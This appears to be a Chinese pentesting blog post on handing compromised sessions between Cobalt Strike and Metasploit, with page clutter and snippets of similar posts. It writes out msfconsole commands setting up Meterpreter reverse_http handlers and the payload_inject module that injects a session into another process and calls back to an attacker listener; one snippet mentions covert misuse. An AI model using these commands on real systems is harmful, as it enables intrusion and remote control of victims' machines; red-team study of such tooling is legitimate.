cobalt strike(CS)与Metasploit(MSF)联动

原创于 2025-08-04 17:28:30 发布 · 352 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#Metasploit #cobalt strike #渗透测试

CS —> MSF

首先cs上创建一个http的外部监听器。

此时在CS服务端查看监听的ip，发现并没有开启，需要到成功移交会话后才会启动。

netstat -tunlp | grep 7000

在MSF中使用handler模块，配置监听。

注意：目标机器的地址是rhost，本地机器的地址是lhost。

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.0.128
lhost => 192.168.0.128
msf6 exploit(multi/handler) > set lport 7000
lport => 7000
msf6 exploit(multi/handler) > run

[*] Started HTTP reverse handler on http://192.168.0.128:7000

此时在对应的想进行移交的交互会话内执行下面命令即可成功移交。

MSF成功监听到会话。

此时再次查看监听器所配置的端口，即可看到已经启动。

netstat -tunlp | grep 7000

MSF —> CS

首先在CS内创建监听器。

将session放在后台，然后配置payloads_inject模块。

background

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http   # 和CS的监听器要一致

set lhost 192.168.0.128   # CS服务端IP

set lport 6669       # CS客户端配置的监听器的端口号

set DisablePayloadHandler True   #禁用MSF自动启动payload handler，因为要用在CS内手动启动的handler。

set PrependMigrate True    #在payload执行前自动迁移到另一个进程，以提高稳定性。

set session 2  # 会话id

run

此时可以看到CS内成功监听到了会话。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ranzi.

关注关注

6
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

cs与msf联动

FSecurity的博客

04-26

583

目录 cobalt strike和metasploit联动 1.使用kali、vps来做cs和msf（这里我使用的vps是阿里云服务器） 2.xshell连接vps，进入msf使用模块use expsploit/multi/handler 3.如果vps没有metersploit就用命令行下载 github（Installing）这里我是已经下载好了的 4.在模块里进行设置，我这里使用的IP是阿里云的内网IP（端口随便） 5.记住xshell的防火墙要关闭（这里我的已经关了）看到绿色标注的“act

内网安全学习(八)---CS&MSF联动

qi_SJQ_的博客

02-17

3882

域横向 CS&MSF 联动 Shell CS->MSF：创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CS： CS创建监听器 MSF载入新模块注入设置对应地址端口执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器，一个上线cs一个上线msf 启动上线cs生成木马上线两台主机，之后启动msf。 1）接下来,将CS移交到MSF上：先添加会话，填写msf主机信息：配

参与评论您还未登录，请先登录后发表或查看评论

72内网安全-域横向CS&MSF联动及应急响应知识

san3144393495的博客

01-01

653

拿到才行，拿不到就是多余的。

CS&MSF联动

kukudeshuo的博客

09-23

463

CS&MSF联动 CS联动MSF 现在CS这边已经成功上线一台主机，需要将这个会话传入MSF CS这边新建一个监听器然后打开MSF use exploit/multi/handler set payload windows/meterpreter/reverse_http #需要设置成CS一样的payload set lhost 192.168.109.128 set lport 5566 #需要设置成跟CS一样的端口然后CS这边选择增加会话然后指定生成的msf监听器即可可以看

cs和msf联动

inslight的博客

09-22

1145

cs和msf联动

CobaltStrike（CS）与MetasploitFramework（MSF）联动

LuckySec

12-04

3661

0x01 CS与MSF CobaltStrike（简称CS）是一款美国Red Team开发的渗透测试神器。Armitage是一个MetasploitFramework（简称MSF）的图形化界面工具，而Cobaltstrike大家可以理解其为Armitage的商业版。早期版本CobaltSrtike依赖MetasploitFramework框架，而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用，它分为客户端(Client)与服务端(Teamserver)

Cobalt Strike与Metasploit Framewor联动（会话传递）功能演示

imtech的博客

02-07

743

Cobalt Strike与Metasploit Framewor联动会话传递

CobaltStrike与MSF联动之CS--＞MSF

最新发布

weixin_67729650的博客

10-20

586

（简称CS）是一款美国Red Team开发的渗透测试神器。是一个（简称MSF）的图形化界面工具，而Cobaltstrike大家可以理解其为Armitage的商业版。早期版本CobaltSrtike依赖MetasploitFramework框架，而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用，它分为客户端(Client)与服务端(Teamserver)，服务端是一个，客户端可以有多个，团队可进行分布式协团操作。

Cobalt Strike获得shell之后如何与msf联动

qiuqiunile_的博客

10-10

380

本机做cs，vps做msf 1.Cobalt Strike派生会话给Metasploit (1)对msf进行设置使用xshell连接vps，进入msfconsole 对msf的设置如下： msfconsole use exploit/multi/handler set payload windows/meterpreter/reversez_http set lhost 172.(这边的ip是服务器的内网地址) set lport 7777 （run） (2)对cs进行设置先设置一个新的监听，这边的I

cs与msf联动概述

weixin_43873557的博客

02-08

2549

cobalt strike（简称CS）及Metasploit（简称msf）各有所长，cs更适合作为稳控平台，msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长，我们进行联动。获得beacon shell，启动socks shell ipconfig 目标机器在24.*网段，仅一个网段思路：利用 beacon shell 在目标机器和团队服务器之间建立 socks，而后再在本地利用proxychains 之类的工具连到目标内网即可。查看团队服务器 socks 端口启起来了没有：netst

msf和cs联动

bring_coco的博客

05-18

2276

环境：kali（192.168.190.128）NATAPP。

MSF&CS互相联动

剁椒鱼头没剁椒的博客

07-28

2371

在日常渗透测试或者是你偷偷干坏事的时候，可能会发现，CS确实是一个强大的后渗透工具，但是奈何CS很多关于漏洞的功能都是只能检测，但是不能攻击，所以需要CS与MSF互相联动起来，这里我就利用一个永恒之蓝漏洞来。

【MSF与CS联动】

一纸荒芜的博客

08-27

3291

msf与cs

CS + MSF 联动

A_dmin的博客

12-23

1737

CS + MSF 联动首先cs上已经成功上线： Kali查看IP地址： Msf上操作： use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听（ps：这里手抖少打了一个7）如果msf处于公网，cs添加监听器Listener，HOST和PORT填写msf监听的地址IP:xxxx，PORT:7777

MSF和CS联动

GoDunTong's Blog

04-08

4506

转载自Snowming04’s Blog 0x01 准备工作受害主机：在关闭 Windows Defender 和其他一切杀软的前提下，在 Win 10 主机下进行的实验。 MSF：本地 kali Cobalt Strike 团队服务器：Ubuntu VPS Cobalt Strike：3.14 团队服务器：客户端：上线过程：因为我关闭了一切杀软及 Windows Defender，自不必做免杀。一些朋友搞不清楚 Windows Executable 和 Windows Exec.

CS与MSF联动/shell互相反弹

qq_59468567的博客

04-12

662

set DisablePayloadHandler true #默认情况下，payload_inject执行之后会在本地产生一个新的handler，由于已经有了一个不需要再产生一个，所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器，和msf的要一一对应，上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个，取决加不加。然后返回前面的增加会话。

cobalt strike(cs)和metasploit(msf)联动

weixin_39251927的博客

05-11

5552

一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 2、CS上操作首先有一个已经建立会话的shell，然后添加监听器Listener，HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:7777 配置内网穿透如果msf主机处于

MSF与CS会话互相传递

fishfishfishman的博客

08-15

1152

作为C2工具，MSF和CS各有千秋，CS有着多种强大的自定义插件和易操作的图形化界面，而MSF集成了针对各类系统的Payload攻击代码，为了针对性的进行攻击，我们有时候会需要将MSF的会话转发到CS，或者相反。

细说——CS联动MSF

LainWith的博客

08-06

7503

目录环境准备CS ——> MSFubuntu准备cs客户机器准备msf准备补充MSF ——> CSMSF准备ubuntu-cs准备网上的文章，写的很简介，看的脑壳疼，自己动手，详实的记录一下学习过程环境准备我使用两台vps，一台是kali 52.69.164.3，一台是ubuntu 52.194.218.196 kali使用msf，ubuntu使用cs服务器，物理机使用cs客户端，虚拟机win7是受害者 CS ——> MSF 简单来说，就是当cs拿到一台主机之后，新增一个用于转发

Cobalt Strike V4：红队演练与对手模拟软件

**CS Cobaltstrike pentest red team platform** - **CS**：这是Cobalt Strike的缩写，强调了该软件在安全测试领域的普遍认知。 - **pentest**：即渗透测试（Penetration Testing），是评估计算机系统、网络或...